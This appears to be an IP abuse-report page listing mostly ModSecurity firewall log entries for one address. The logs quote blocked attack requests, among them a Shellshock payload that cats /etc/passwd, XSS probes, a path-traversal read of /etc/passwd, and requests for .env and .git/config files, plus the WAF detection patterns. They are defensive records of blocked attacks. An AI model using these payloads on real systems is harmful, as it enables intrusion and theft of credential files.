๐บ๐ธ
TPI-Abuse
2026-01-16 08:18:38
(4 months ago)
(mod_security) mod_security (id:221260) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:221260) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Fri Jan 16 03:18:29.898985 2026] [security2:error] [pid 28865:tid 28865] [client 45.141.81.88:57947] ModSecurity: Access denied with code 403 (phase 1). Pattern match "^(?:\\\\'\\\\w+?=)?\\\\(\\\\)\\\\s{" at MATCHED_VAR. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "77"] [id "221260"] [rev "3"] [msg "COMODO WAF: Shellshock Command Injection Vulnerabilities in GNU Bash through 4.3 bash43-026 (CVE-2014-7187, CVE-2014-7186, CVE-2014-7169, CVE-2014-6278, CVE-2014-6277, CVE-2014-6271)||www.nbcnewsradio.com:443|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.nbcnewsradio.com"] [uri "/debug.cgi"] [unique_id "aWn0VT4dk4Ds1Jzr-FfzwQAAAA4"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-12-29 21:27:26
(5 months ago)
(mod_security) mod_security (id:212750) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:212750) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Dec 29 16:27:21.621917 2025] [security2:error] [pid 21673:tid 21678] [client 45.141.81.88:59877] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\bon(?:abort|blur|change|click|dblclick|dragdrop|error|focus|keydown|keypress|keyup|load|mouse(?:down|move|out|over|up)|move|readystatechange|reset|resize|select|submit|unload)\\\\b[^a-zA-Z0-9_]{0,}?=" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/07_XSS_XSS.conf"] [line "69"] [id "212750"] [rev "3"] [msg "COMODO WAF: XSS Attack Detected||www.kettlehill.net|F|2"] [data "Matched Data: onerror= found within REQUEST_URI: /?s=<img src=x onerror=alert(123);>"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "www.kettlehill.net"] [uri "/"] [unique_id "aVLyOdoKFoxlNLdnJRxXkwAAAEI"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-12-01 07:18:59
(6 months ago)
(mod_security) mod_security (id:210492) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:210492) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Dec 01 02:18:55.173354 2025] [security2:error] [pid 27471:tid 27492] [client 45.141.81.88:58951] ModSecurity: Access denied with code 403 (phase 1). Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcontacts.kettlehill.com"] [uri "/sample.htaccess"] [unique_id "aS1BX3LXOKC0tXS7y0k_QAAAAIQ"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-11-13 10:41:10
(6 months ago)
(mod_security) mod_security (id:212620) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:212620) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Nov 13 05:40:54.791321 2025] [security2:error] [pid 29629:tid 29629] [client 45.141.81.88:52743] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<script\\\\b" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/07_XSS_XSS.conf"] [line "65"] [id "212620"] [rev "4"] [msg "COMODO WAF: Cross-site Scripting (XSS) Attack||ftp.nbcnewsradio.com|F|2"] [data "Matched Data: <script found within REQUEST_URI: /ie50/system/login/sysloginuser.aspx?login=denied&uid=</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "ftp.nbcnewsradio.com"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "aRW1toVm6eW0GrsKeJ9RIQAAAA8"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-10-01 15:06:09
(8 months ago)
(mod_security) mod_security (id:210492) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:210492) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Wed Oct 01 11:05:58.487068 2025] [security2:error] [pid 17241:tid 17258] [client 45.141.81.88:33201] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.kettlehill.com"] [uri "/.env.bak"] [unique_id "aN1DVqh4GLz6vZLSqBy3WAAAAIs"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ฎ๐น
Progetto1
2025-08-26 21:10:02
(9 months ago)
Website Scanning / Scraping
Bad Web Bot
Exploited Host
Web App Attack
Anonymous
2025-08-20 01:35:08
(9 months ago)
suspicious request in access.log
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-07-27 00:16:53
(10 months ago)
(mod_security) mod_security (id:210492) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:210492) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Jul 26 20:16:44.378565 2025] [security2:error] [pid 172229:tid 172470] [client 45.141.81.88:55681] ModSecurity: Access denied with code 403 (phase 1). Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cpcontacts.kettlehill.com"] [uri "/content../.git/config"] [unique_id "aIVv7OZd-uShJ73phjvlmgAAAQU"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2025-05-29 17:25:36
(1 year ago)
(mod_security) mod_security (id:212620) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:212620) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu May 29 13:25:27.867053 2025] [security2:error] [pid 3067355:tid 3067355] [client 45.141.81.88:49293] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<script\\\\b" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/07_XSS_XSS.conf"] [line "65"] [id "212620"] [rev "4"] [msg "COMODO WAF: Cross-site Scripting (XSS) Attack||ftp.farmers123.com|F|2"] [data "Matched Data: <script found within REQUEST_URI: /phpmyadmin/setup/index.php?page=servers&mode=test&id=\\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] [hostname "ftp.farmers123.com"] [uri "/phpmyadmin/setup/index.php"] [unique_id "aDiYhxb9Vo1_uR5EuTp0dQAAAAA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
Vincent Helmus
2025-05-16 17:40:18
(1 year ago)
ALL
DNS Compromise
DNS Poisoning
Fraud Orders
DDoS Attack
FTP Brute-Force
Ping of Death
Phishing
Fraud VoIP
Open Proxy
Web Spam
Email Spam
Blog Spam
VPN IP
Port Scan
Hacking
SQL Injection
Spoofing
Brute-Force
Bad Web Bot
Exploited Host
Web App Attack
SSH
IoT Targeted
๐บ๐ธ
TPI-Abuse
2025-04-19 05:24:26
(1 year ago)
(mod_security) mod_security (id:211190) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports ...
show more
(mod_security) mod_security (id:211190) triggered by 45.141.81.88 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sat Apr 19 01:24:08.239389 2025] [security2:error] [pid 22650:tid 22662] [client 45.141.81.88:40025] [client 45.141.81.88] ModSecurity: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||www.blog.spinningdesigns.com|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "blog.spinningdesigns.com"] [uri "/page/sl_logdl"] [unique_id "aAMzeMLYwl69KqC_78iZuAAAAEk"]
show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2025-01-26 11:00:21
(1 year ago)
| Common web attack.
Hacking
SQL Injection
Web App Attack